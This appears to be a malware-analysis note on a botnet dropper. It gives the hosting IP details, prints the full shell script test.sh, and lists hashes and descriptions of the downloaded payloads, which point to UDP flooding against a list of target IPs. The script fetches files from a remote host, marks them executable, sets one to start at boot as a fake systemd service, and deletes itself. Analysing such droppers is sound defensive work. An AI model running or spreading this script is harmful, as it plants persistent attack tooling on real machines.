IP info:
ip: "185.245.62.231",
city: "Frankfurt am Main",
org: "AS200303 Jan Philipp Waldecker trading as LUMASERV Systems",
postal: "60306",
timezone: "Europe/Berlin"
test.sh (f0869b01daa7d4ca611de720e87a8423c5ab03b194d4dfe92b54302a7ee74ceb):
#!/bin/sh
apt-get -y install python3;
apt-get -y install nodejs;
cd /etc/;
wget hxxp://185.245.62.231/x1;
wget hxxp://185.245.62.231/v1.py;
wget hxxp://185.245.62.231/g1.js;
wget hxxp://185.245.62.231/s1;
wget hxxp://185.245.62.231/p1.txt;
chmod 777 x1;
chmod 777 v1.py;
chmod 777 g1.js;
chmod 777 s1;
chmod 777 p1.txt;
printf "[Unit]\nDescription=System\n[Service]\nExecStart=/usr/bin/python3 /etc/v1.py\n[Install]\nWantedBy=multi-user.target\n" > /etc/systemd/system/hosting.service;
systemctl enable hosting;
systemctl start hosting;
rm -r /etc/test.sh;
g1.js (5a5617cffae3b052f632a5be52190cdb):
- connection script with list of useragents to randomly cycle through
p1.txt (39e254dbab7a6031f11524547fb5b6f1):
- list of 951 ip addresses and ports in colon-separated format
- ex: 5.180.130.90:80
-typically HTTP related ports (i.e., 80, 8000, 8080), but also some ephemeral (e.g., 17471, 17980, 55507)
v1.py (aa41d0d0c9d7709d86527f972131415b):
- python script referenced as hosting.service in test.sh
- heavily obfuscated using AtShai service below
s1 (434ed30938bef3099217f8c00c62fb77):
- VT first submission 2022-03-05 03:37:52 UTC
- https://www.virustotal.com/gui/file/cefe44a4efdea412a70d6568096476476d00e925a6908b45cc0b4d6c36971126
x1 (781aa9e40ef59f3526e7f89d13b4e4e8):
- VT first submission 2022-03-05 03:37:52 UTC
- https://www.virustotal.com/gui/file/9aaa130eaaedcd4bba0b0056a5feff4b967fc88bc3d457be8b8b2f0309965c6f/details
- many strings align with the following C code: https://github.com/isdrupter/busybotnet/blob/master/miscutils/udpspoof.c
AtShai:
- obfuscation as a service (OaaS?)
- https://www.youtube.com/channel/UCdjncPtlh39boMqFrGx_yxw
- https://atshai.com/python-obfuscator-obfuscating-python-scripts.php
- https://www.enscrypt.io/python-pricing-table-online-popular.php